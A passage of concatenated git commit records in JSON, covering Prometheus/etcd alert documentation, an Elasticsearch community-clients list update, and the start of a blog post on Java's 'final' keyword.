log is corrupted. 
Description: _Job_ at _Instance_ has a corrupted write-ahead log (WAL).\n|`PrometheusNotIngestingSamples`|`warning`|Summary: Prometheus isn't ingesting samples. Description: Prometheus _Namespace\/Pod_ isn't ingesting samples.\n|`PrometheusTargetScrapesDuplicate`|`warning`|Summary: Prometheus has many samples rejected. Description: _Namespace\/Pod_ has many samples rejected due to duplicate timestamps but different values\n|`EtcdInsufficientMembers`|`critical`|Etcd cluster \"_Job_\": insufficient members (_X_).\n|`EtcdNoLeader`|`critical`|Etcd cluster \"_Job_\": member _Instance_ has no leader.\n|`EtcdHighNumberOfLeaderChanges`|`warning`|Etcd cluster \"_Job_\": instance _Instance_ has seen _X_ leader changes within the last hour.\n|`EtcdHighNumberOfFailedGRPCRequests`|`warning`|Etcd cluster \"_Job_\": _X_% of requests for _GRPC_Method_ failed on etcd instance _Instance_.\n|`EtcdHighNumberOfFailedGRPCRequests`|`critical`|Etcd cluster \"_Job_\": _X_% of requests for _GRPC_Method_ failed on etcd instance _Instance_.\n|`EtcdGRPCRequestsSlow`|`critical`|Etcd cluster \"_Job_\": gRPC requests to _GRPC_Method_ are taking _X_s on etcd instance _Instance_.\n|`EtcdMemberCommunicationSlow`|`warning`|Etcd cluster \"_Job_\": member communication with _To_ is taking _X_s on etcd instance _Instance_.\n|`EtcdHighNumberOfFailedProposals`|`warning`|Etcd cluster \"_Job_\": _X_ proposal failures within the last hour on etcd instance _Instance_.\n|`EtcdHighFsyncDurations`|`warning`|Etcd cluster \"_Job_\": 99th percentile fync durations are _X_s on etcd instance _Instance_.\n|`EtcdHighCommitDurations`|`warning`|Etcd cluster \"_Job_\": 99th percentile commit durations _X_s on etcd instance _Instance_.\n|`FdExhaustionClose`|`warning`|_Job_ instance _Instance_ will exhaust its file descriptors soon\n|`FdExhaustionClose`|`critical`|_Job_ instance _Instance_ will exhaust its file descriptors soon\n|===\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"86b3ff229ca484ffe891e0512b8bea0d1bcfb23c","subject":"Add new ruby search library to community clients doc (#22765)","message":"Add new ruby search library to community clients doc (#22765)\n\n* Add new Ruby search lib from Artsy.\r\n\r\n* update ruby library reference following 
rename\r\n","repos":"jimczi\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,bawse\/elasticsearch,glefloch\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,Stacey-Gammon\/elasticsearch,C-Bish\/elasticsearch,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,artnowo\/elasticsearch,sneivandt\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,Helen-Zhao\/elasticsearch,C-Bish\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,geidies\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nilabhsagar\/elasticsearch,njlawton\/elasticsearch,glefloch\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,fred84\/elasticsearch,i-am-Nathan\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,Helen-Zhao\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,fernandozhu\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,Shepard1212\/elasticsearch,JSCooke\/elasticsearch,uschindler\/elasticsearch,rlugojr\/elasticsearch,strapdata\/elassandra,njlawton\/elasticsearch,StefanGor\/elasticsearch,MisterAndersen\/elasticsearch,vroyer\/elassandra,bawse\/elasticsearch,mortonsykes\/elasticsearch,fernandozhu\/elasticsearch,qwerty4030\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,obourgain\/elasticsearch,alexshadow007\/elasticsearch,StefanGor\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rlugojr\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,mikemccand\/elasticsearch,rlugojr\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,artnowo\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,nezirus\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,winstonewert\/elasticsearch,jprante\/elasticsearch,JackyMai\/elasticsearch,Shepard1212\/elasticsearch,brandonkearby\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,njlawton\/elasticsearch,geidies\/elasticsearch,alexshadow007\/elasticsearch,wangtuo\/elasticsearch,nazarewk\/elasticsearch,markwalkom\/elasticsearch,IanvsPoplicola\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,alexshadow007\/elasticsearch,mortonsykes\/elasticsearch,Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch,maddin2016\/elasticsearch,StefanGor\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,nilabhsagar\/elasticsearch,Shepard1212\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,brandonkearby\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,nazarewk\/elasticsearch,nezirus\/elasticsearch,Shepard1212\/elasticsearch,gingerwizard\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,Helen-Zhao\/elasticsearch,scottsom\/elasticsearch,coding0011\/elasticsearch,JackyMai\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elastic
search,shreejay\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra,maddin2016\/elasticsearch,rlugojr\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,brandonkearby\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,njlawton\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,C-Bish\/elasticsearch,scorpionvicky\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,obourgain\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,winstonewert\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,MisterAndersen\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,artnowo\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,obourgain\/elasticsearch,ZTE-PaaS\/elasticsearch,mortonsykes\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,JSCooke\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,winstonewert\/elasticsearch,LewayneNaidoo\/elasticsearch,glefloch\/elasticsearch,kalimatas\/elasticsearch,JSCooke\/elasticsearch,GlenRSmith\/elasticsearch,fernandozhu\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,bawse\/elasticsearch,geidies\/elasticsearch,scorpionvicky\/elasticsearch,masaruh\/elasticsearch,artnowo\/elasticsearch,rajanm\/elasticsearch,i-am-Nathan\/elasticsearch,HonzaKral\/elasticsearch,fernandozhu\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,StefanGor\/elasticsearch,robin13\/elasticsearch,elasticdog\/elasticsearch,nezirus\/elasticsearch,nazarewk\/elasticsearch,LewayneNaidoo\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,geidies\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,shreejay\/elasticsearch,a2lin\/elasticsearch,artnowo\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,a2lin\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,a2lin\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,naveenhooda2000\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,C-Bish\/elasticsearch,qwerty4030\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,glefloch\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,mjason3\/elasticsearch,jimczi\/elasticsearch,mikemccand\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,i-am-Nathan\/elasticsearch,n
ilabhsagar\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,vroyer\/elasticassandra,ZTE-PaaS\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,mikemccand\/elasticsearch,vroyer\/elassandra,mortonsykes\/elasticsearch,jprante\/elasticsearch,MisterAndersen\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,nilabhsagar\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,umeshdangat\/elasticsearch,bawse\/elasticsearch,obourgain\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,i-am-Nathan\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,elasticdog\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,bawse\/elasticsearch,a2lin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,uschindler\/elasticsearch,naveenhooda2000\/elasticsearch","old_file":"docs\/community-clients\/index.asciidoc","new_file":"docs\/community-clients\/index.asciidoc","new_contents":"= Community Contributed Clients\n\n:client: https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/client\n\nBesides the link:\/guide[officially supported Elasticsearch clients], there are\na number of clients that have been contributed by the community for various languages:\n\n* <<b4j>>\n* <<clojure>>\n* <<cold-fusion>>\n* <<erlang>>\n* <<go>>\n* <<groovy>>\n* <<haskell>>\n* <<java>>\n* <<javascript>>\n* <<kotlin>>\n* <<lua>>\n* <<dotnet>>\n* <<ocaml>>\n* <<perl>>\n* <<php>>\n* <<python>>\n* <<r>>\n* <<ruby>>\n* <<scala>>\n* <<smalltalk>>\n* <<vertx>>\n\n[[b4j]]\n== B4J\n* https:\/\/www.b4x.com\/android\/forum\/threads\/server-jelasticsearch-search-and-text-analytics.73335\/\n B4J client based on the official Java REST client.\n\n[[clojure]]\n== Clojure\n\n* http:\/\/github.com\/clojurewerkz\/elastisch[Elastisch]:\n Clojure client.\n\n[[cold-fusion]]\n== Cold Fusion\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/jasonfill\/ColdFusion-ElasticSearch-Client[ColdFusion-Elasticsearch-Client]\n Cold Fusion client for Elasticsearch\n\n[[erlang]]\n== Erlang\n\n* http:\/\/github.com\/tsloughter\/erlastic_search[erlastic_search]:\n Erlang client using HTTP.\n\n* https:\/\/github.com\/dieswaytoofast\/erlasticsearch[erlasticsearch]:\n Erlang client using Thrift.\n\n* https:\/\/github.com\/datahogs\/tirexs[Tirexs]:\n An https:\/\/github.com\/elixir-lang\/elixir[Elixir] based API\/DSL, inspired by\n http:\/\/github.com\/karmi\/tire[Tire]. 
Ready to use in pure Erlang\n environment.\n\n\n[[go]]\n== Go\n\n* https:\/\/github.com\/mattbaird\/elastigo[elastigo]:\n Go client.\n\n* https:\/\/github.com\/belogik\/goes[goes]:\n Go lib.\n\n* https:\/\/github.com\/olivere\/elastic[elastic]:\n Elasticsearch client for Google Go.\n\n\n[[groovy]]\n== Groovy\n\nSee the {client}\/groovy-api\/current\/index.html[official Elasticsearch Groovy client].\n\n[[haskell]]\n== Haskell\n* https:\/\/github.com\/bitemyapp\/bloodhound[bloodhound]:\n Haskell client and DSL.\n\n\n[[java]]\n== Java\n\nAlso see the {client}\/java-api\/current\/index.html[official Elasticsearch Java client].\n\n* https:\/\/github.com\/otto-de\/flummi[Flummi]:\n Java Rest client with comprehensive query DSL API\n* https:\/\/github.com\/searchbox-io\/Jest[Jest]:\n Java Rest client.\n\n[[javascript]]\n== JavaScript\n\nAlso see the {client}\/javascript-api\/current\/index.html[official Elasticsearch JavaScript client].\n\n* https:\/\/github.com\/fullscale\/elastic.js[Elastic.js]:\n A JavaScript implementation of the Elasticsearch Query DSL and Core API.\n\n* https:\/\/github.com\/printercu\/elastics[elastics]: Simple tiny client that just works\n\n* https:\/\/github.com\/roundscope\/ember-data-elasticsearch-kit[ember-data-elasticsearch-kit]:\n An ember-data kit for both pushing and querying objects to an Elasticsearch cluster\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/ramv\/node-elastical[node-elastical]:\n Node.js client for the Elasticsearch REST API\n\n[[kotlin]]\n== Kotlin\n\n* https:\/\/github.com\/mbuhot\/eskotlin[ES Kotlin]:\n Elasticsearch Query DSL for Kotlin based on the {client}\/java-api\/current\/index.html[official Elasticsearch Java client].\n\n[[lua]]\n== Lua\n\n* https:\/\/github.com\/DhavalKapil\/elasticsearch-lua[elasticsearch-lua]:\n Lua client for Elasticsearch\n\n[[dotnet]]\n== .NET\n\nAlso see the {client}\/net-api\/current\/index.html[official Elasticsearch .NET client].\n\n* https:\/\/github.com\/Yegoroff\/PlainElastic.Net[PlainElastic.Net]:\n .NET client.\n\n[[ocaml]]\n== OCaml\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/tovbinm\/ocaml-elasticsearch[ocaml-elasticsearch]:\n OCaml client for Elasticsearch\n\n[[perl]]\n== Perl\n\nAlso see the {client}\/perl-api\/current\/index.html[official Elasticsearch Perl client].\n\n* https:\/\/metacpan.org\/pod\/Elastijk[Elastijk]: A low level minimal HTTP client.\n\n\n[[php]]\n== PHP\n\nAlso see the {client}\/php-api\/current\/index.html[official Elasticsearch PHP client].\n\n* http:\/\/github.com\/ruflin\/Elastica[Elastica]:\n PHP client.\n\n* http:\/\/github.com\/nervetattoo\/elasticsearch[elasticsearch] PHP client.\n\n* https:\/\/github.com\/madewithlove\/elasticsearcher[elasticsearcher] Agnostic lightweight package on top of the Elasticsearch PHP client. Its main goal is to allow for easier structuring of queries and indices in your application.
It does not want to hide or replace functionality of the Elasticsearch PHP client.\n\n[[python]]\n== Python\n\nAlso see the {client}\/python-api\/current\/index.html[official Elasticsearch Python client].\n\n* http:\/\/github.com\/rhec\/pyelasticsearch[pyelasticsearch]:\n Python client.\n\n* https:\/\/github.com\/eriky\/ESClient[ESClient]:\n A lightweight and easy to use Python client for Elasticsearch.\n\n* https:\/\/github.com\/mozilla\/elasticutils\/[elasticutils]:\n A friendly chainable Elasticsearch interface for Python.\n\n* http:\/\/github.com\/aparo\/pyes[pyes]:\n Python client.\n\nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/humangeo\/rawes[rawes]:\n Python low level client.\n\n* http:\/\/intridea.github.io\/surfiki-refine-elasticsearch\/[Surfiki Refine]:\n Python Map-Reduce engine targeting Elasticsearch indices.\n\n[[r]]\n== R\n\n* https:\/\/github.com\/ropensci\/elastic[elastic]:\n A low-level R client for Elasticsearch.\n\n* https:\/\/github.com\/ropensci\/elasticdsl[elasticdsl]:\n A high-level R DSL for Elasticsearch, wrapping the elastic R client.\n \nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/Tomesch\/elasticsearch[elasticsearch]\n R client for Elasticsearch\n\n[[ruby]]\n== Ruby\n\nAlso see the {client}\/ruby-api\/current\/index.html[official Elasticsearch Ruby client].\n\n* https:\/\/github.com\/PoseBiz\/stretcher[stretcher]:\n Ruby client.\n\n* https:\/\/github.com\/printercu\/elastics-rb[elastics]:\n Tiny client with built-in zero-downtime migrations and ActiveRecord integration.\n\n* https:\/\/github.com\/toptal\/chewy[chewy]:\n Chewy is ODM and wrapper for official elasticsearch client\n\n* https:\/\/github.com\/ankane\/searchkick[Searchkick]:\n Intelligent search made easy\n\n* https:\/\/github.com\/artsy\/estella[Estella]:\n Make your Ruby models searchable\n\nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/wireframe\/elastic_searchable\/[elastic_searchable]:\n Ruby client + Rails integration.\n\n* https:\/\/github.com\/ddnexus\/flex[Flex]:\n Ruby Client.\n\n\n\n[[scala]]\n== Scala\n\n* https:\/\/github.com\/sksamuel\/elastic4s[elastic4s]:\n Scala DSL.\n\n* https:\/\/github.com\/scalastuff\/esclient[esclient]:\n Thin Scala client.\n\n* https:\/\/github.com\/gphat\/wabisabi[wabisabi]:\n Asynchronous REST API Scala client.\n\n* https:\/\/github.com\/SumoLogic\/elasticsearch-client[elasticsearch-client]:\n Scala DSL that uses the REST API. 
Akka and AWS helpers included.\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/bsadeh\/scalastic[scalastic]:\n Scala client.\n\n\n[[smalltalk]]\n== Smalltalk\n\n* https:\/\/github.com\/newapplesho\/elasticsearch-smalltalk[elasticsearch-smalltalk] -\n Pharo Smalltalk client for Elasticsearch\n\n* http:\/\/ss3.gemstone.com\/ss\/Elasticsearch.html[Elasticsearch] -\n Smalltalk client for Elasticsearch\n\n\n[[vertx]]\n== Vert.x\n\n* https:\/\/github.com\/goodow\/realtime-search[realtime-search]:\n Elasticsearch module for Vert.x\n","old_contents":"= Community Contributed Clients\n\n:client: https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/client\n\nBesides the link:\/guide[officially supported Elasticsearch clients], there are\na number of clients that have been contributed by the community for various languages:\n\n* <<b4j>>\n* <<clojure>>\n* <<cold-fusion>>\n* <<erlang>>\n* <<go>>\n* <<groovy>>\n* <<haskell>>\n* <<java>>\n* <<javascript>>\n* <<kotlin>>\n* <<lua>>\n* <<dotnet>>\n* <<ocaml>>\n* <<perl>>\n* <<php>>\n* <<python>>\n* <<r>>\n* <<ruby>>\n* <<scala>>\n* <<smalltalk>>\n* <<vertx>>\n\n[[b4j]]\n== B4J\n* https:\/\/www.b4x.com\/android\/forum\/threads\/server-jelasticsearch-search-and-text-analytics.73335\/\n B4J client based on the official Java REST client.\n\n[[clojure]]\n== Clojure\n\n* http:\/\/github.com\/clojurewerkz\/elastisch[Elastisch]:\n Clojure client.\n\n[[cold-fusion]]\n== Cold Fusion\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/jasonfill\/ColdFusion-ElasticSearch-Client[ColdFusion-Elasticsearch-Client]\n Cold Fusion client for Elasticsearch\n\n[[erlang]]\n== Erlang\n\n* http:\/\/github.com\/tsloughter\/erlastic_search[erlastic_search]:\n Erlang client using HTTP.\n\n* https:\/\/github.com\/dieswaytoofast\/erlasticsearch[erlasticsearch]:\n Erlang client using Thrift.\n\n* https:\/\/github.com\/datahogs\/tirexs[Tirexs]:\n An https:\/\/github.com\/elixir-lang\/elixir[Elixir] based API\/DSL, inspired by\n http:\/\/github.com\/karmi\/tire[Tire]. 
Ready to use in pure Erlang\n environment.\n\n\n[[go]]\n== Go\n\n* https:\/\/github.com\/mattbaird\/elastigo[elastigo]:\n Go client.\n\n* https:\/\/github.com\/belogik\/goes[goes]:\n Go lib.\n\n* https:\/\/github.com\/olivere\/elastic[elastic]:\n Elasticsearch client for Google Go.\n\n\n[[groovy]]\n== Groovy\n\nSee the {client}\/groovy-api\/current\/index.html[official Elasticsearch Groovy client].\n\n[[haskell]]\n== Haskell\n* https:\/\/github.com\/bitemyapp\/bloodhound[bloodhound]:\n Haskell client and DSL.\n\n\n[[java]]\n== Java\n\nAlso see the {client}\/java-api\/current\/index.html[official Elasticsearch Java client].\n\n* [Flummi](https:\/\/github.com\/otto-de\/flummi):\n Java Rest client with comprehensive query DSL API\n* https:\/\/github.com\/searchbox-io\/Jest[Jest]:\n Java Rest client.\n\n[[javascript]]\n== JavaScript\n\nAlso see the {client}\/javascript-api\/current\/index.html[official Elasticsearch JavaScript client].\n\n* https:\/\/github.com\/fullscale\/elastic.js[Elastic.js]:\n A JavaScript implementation of the Elasticsearch Query DSL and Core API.\n\n* https:\/\/github.com\/printercu\/elastics[elastics]: Simple tiny client that just works\n\n* https:\/\/github.com\/roundscope\/ember-data-elasticsearch-kit[ember-data-elasticsearch-kit]:\n An ember-data kit for both pushing and querying objects to Elasticsearch cluster\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/ramv\/node-elastical[node-elastical]:\n Node.js client for the Elasticsearch REST API\n\n[[kotlin]]\n== kotlin\n\n* https:\/\/github.com\/mbuhot\/eskotlin[ES Kotlin]:\n Elasticsearch Query DSL for kotlin based on the {client}\/java-api\/current\/index.html[official Elasticsearch Java client].\n\n[[lua]]\n== Lua\n\n* https:\/\/github.com\/DhavalKapil\/elasticsearch-lua[elasticsearch-lua]:\n Lua client for elasticsearch\n\n[[dotnet]]\n== .NET\n\nAlso see the {client}\/net-api\/current\/index.html[official Elasticsearch .NET client].\n\n* https:\/\/github.com\/Yegoroff\/PlainElastic.Net[PlainElastic.Net]:\n .NET client.\n\n[[ocaml]]\n== OCaml\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/tovbinm\/ocaml-elasticsearch[ocaml-elasticsearch]:\n OCaml client for Elasticsearch\n\n[[perl]]\n== Perl\n\nAlso see the {client}\/perl-api\/current\/index.html[official Elasticsearch Perl client].\n\n* https:\/\/metacpan.org\/pod\/Elastijk[Elastijk]: A low level minimal HTTP client.\n\n\n[[php]]\n== PHP\n\nAlso see the {client}\/php-api\/current\/index.html[official Elasticsearch PHP client].\n\n* http:\/\/github.com\/ruflin\/Elastica[Elastica]:\n PHP client.\n\n* http:\/\/github.com\/nervetattoo\/elasticsearch[elasticsearch] PHP client.\n\n* https:\/\/github.com\/madewithlove\/elasticsearcher[elasticsearcher] Agnostic lightweight package on top of the Elasticsearch PHP client. Its main goal is to allow for easier structuring of queries and indices in your application. 
It does not want to hide or replace functionality of the Elasticsearch PHP client.\n\n[[python]]\n== Python\n\nAlso see the {client}\/python-api\/current\/index.html[official Elasticsearch Python client].\n\n* http:\/\/github.com\/rhec\/pyelasticsearch[pyelasticsearch]:\n Python client.\n\n* https:\/\/github.com\/eriky\/ESClient[ESClient]:\n A lightweight and easy to use Python client for Elasticsearch.\n\n* https:\/\/github.com\/mozilla\/elasticutils\/[elasticutils]:\n A friendly chainable Elasticsearch interface for Python.\n\n* http:\/\/github.com\/aparo\/pyes[pyes]:\n Python client.\n\nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/humangeo\/rawes[rawes]:\n Python low level client.\n\n* http:\/\/intridea.github.io\/surfiki-refine-elasticsearch\/[Surfiki Refine]:\n Python Map-Reduce engine targeting Elasticsearch indices.\n\n[[r]]\n== R\n\n* https:\/\/github.com\/ropensci\/elastic[elastic]:\n A low-level R client for Elasticsearch.\n\n* https:\/\/github.com\/ropensci\/elasticdsl[elasticdsl]:\n A high-level R DSL for Elasticsearch, wrapping the elastic R client.\n \nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/Tomesch\/elasticsearch[elasticsearch]\n R client for Elasticsearch\n\n[[ruby]]\n== Ruby\n\nAlso see the {client}\/ruby-api\/current\/index.html[official Elasticsearch Ruby client].\n\n* https:\/\/github.com\/PoseBiz\/stretcher[stretcher]:\n Ruby client.\n\n* https:\/\/github.com\/printercu\/elastics-rb[elastics]:\n Tiny client with built-in zero-downtime migrations and ActiveRecord integration.\n\n* https:\/\/github.com\/toptal\/chewy[chewy]:\n Chewy is ODM and wrapper for official elasticsearch client\n\n* https:\/\/github.com\/ankane\/searchkick[Searchkick]:\n Intelligent search made easy\n\nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/wireframe\/elastic_searchable\/[elastic_searchable]:\n Ruby client + Rails integration.\n\n* https:\/\/github.com\/ddnexus\/flex[Flex]:\n Ruby Client.\n\n\n\n[[scala]]\n== Scala\n\n* https:\/\/github.com\/sksamuel\/elastic4s[elastic4s]:\n Scala DSL.\n\n* https:\/\/github.com\/scalastuff\/esclient[esclient]:\n Thin Scala client.\n\n* https:\/\/github.com\/gphat\/wabisabi[wabisabi]:\n Asynchronous REST API Scala client.\n\n* https:\/\/github.com\/SumoLogic\/elasticsearch-client[elasticsearch-client]:\n Scala DSL that uses the REST API. 
Akka and AWS helpers included.\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/bsadeh\/scalastic[scalastic]:\n Scala client.\n\n\n[[smalltalk]]\n== Smalltalk\n\n* https:\/\/github.com\/newapplesho\/elasticsearch-smalltalk[elasticsearch-smalltalk] -\n Pharo Smalltalk client for Elasticsearch\n\n* http:\/\/ss3.gemstone.com\/ss\/Elasticsearch.html[Elasticsearch] -\n Smalltalk client for Elasticsearch\n\n\n[[vertx]]\n== Vert.x\n\n* https:\/\/github.com\/goodow\/realtime-search[realtime-search]:\n Elasticsearch module for Vert.x\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db66726d24e1228be33849bc3e990ab801f2eb87","subject":"doc\/minor configuration of rpc port","message":"doc\/minor configuration of rpc port\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72ca7d0d2d53adde63182913a6c0b309dae4192a","subject":"Update 2016-04-19-On-the-Subject-of-Finality.adoc","message":"Update 2016-04-19-On-the-Subject-of-Finality.adoc","repos":"reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io","old_file":"_posts\/2016-04-19-On-the-Subject-of-Finality.adoc","new_file":"_posts\/2016-04-19-On-the-Subject-of-Finality.adoc","new_contents":"= On the Subject of Finality\n:hp-tags: programming, Java, final, immutability\n\nThis is the second installment in the _How to Make Your Java Code Not Suck_ series.\n\n== Fightin' (key)words\n\nWhen debating Java code style, the one issue that has probably gotten me into the greatest number of heated arguments is the appropriate use of the keyword `final`. I am not alone in my views on the subject, but it seems that there are great unwashed masses of developers who have not yet been converted to the *Church of `final`*, and some of them seem to get quite annoyed when they see `final` used in places where it is not absolutely required.\n\nHowever, before I go into detail on what my exact position is on the subject, and why nonbelievers are doomed to burn in Mutability Hell, let's recap what, exactly, `final` means when it appears in Java code.\n\n== Final Overload\n\nFirst of all, any Java programmer worth his or her salt knows that `final` actually has two completely different meanings in Java, depending on where it is used.\n\nThe first, and probably most commonly used, meaning of `final` is as a modifier on declarations of variables, fields, and parameters. When applied in front of one of these, it effectively makes the identifier a constant for the duration of its scope. This means that once the identifier is initialized, the value it refers to cannot be changed. Its use is generally mandated when defining constants (especially in conjunction with the `static` keyword), and prior to Java 8, its use was required by the compiler whenever an anonymous class creates a closure around a variable in the enclosing scope.
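To see that compiler rule in action, here is a small example of my own (not from any spec, just what `javac` enforced):

[source,java]
----
public class ClosureExample {
    public static void main(final String[] args) {
        // Before Java 8, the capture below only compiled if 'greeting'
        // was declared final; Java 8 relaxed this to "effectively final".
        final String greeting = "hello";
        Runnable task = new Runnable() {
            @Override
            public void run() {
                System.out.println(greeting); // closes over the enclosing local
            }
        };
        task.run();
    }
}
----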
